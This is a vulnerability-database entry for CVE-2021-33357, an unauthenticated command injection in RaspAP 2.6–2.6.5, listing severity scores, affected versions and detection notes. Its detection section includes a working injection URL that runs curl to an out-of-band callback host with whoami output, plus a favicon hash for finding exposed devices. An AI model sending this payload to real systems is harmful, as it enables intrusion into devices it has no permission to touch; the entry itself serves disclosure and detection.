cbcvebase.
CVE-2021-33357
published 2021-06-09

CVE-2021-33357: A vulnerability exists in RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains…

PriorityP187critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
17.90%
96.8th percentile
A vulnerability exists in RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands.

Affected

1 ranges
VendorProductVersion rangeFixed in
raspapraspap2.6 – 2.6.5

Detection & IOCsextracted from sources · hover to see the quote

path/ajax/networking/get_netcfg.php
url{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;
  • Look for GET requests to /ajax/networking/get_netcfg.php where the 'iface' parameter contains shell metacharacters such as ';'
  • Use Shodan/FOFA favicon hash to identify exposed RaspAP instances: favicon hash -1465760059
  • Exploitation can be confirmed via out-of-band HTTP callback (interactsh/OAST) triggered by injected curl command with whoami output in the URL path
  • Response body containing 'DHCPEnabled' confirms the endpoint is reachable and vulnerable
  • Interactsh/OAST request path regex 'GET \/([a-z-]+) HTTP' can be used to extract the whoami output from the callback
  • ·The vulnerability is unauthenticated — no session or credentials are required to exploit the endpoint
  • ·Affected versions are strictly RaspAP 2.6 through 2.6.5; versions above 2.6.5 are not affected

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.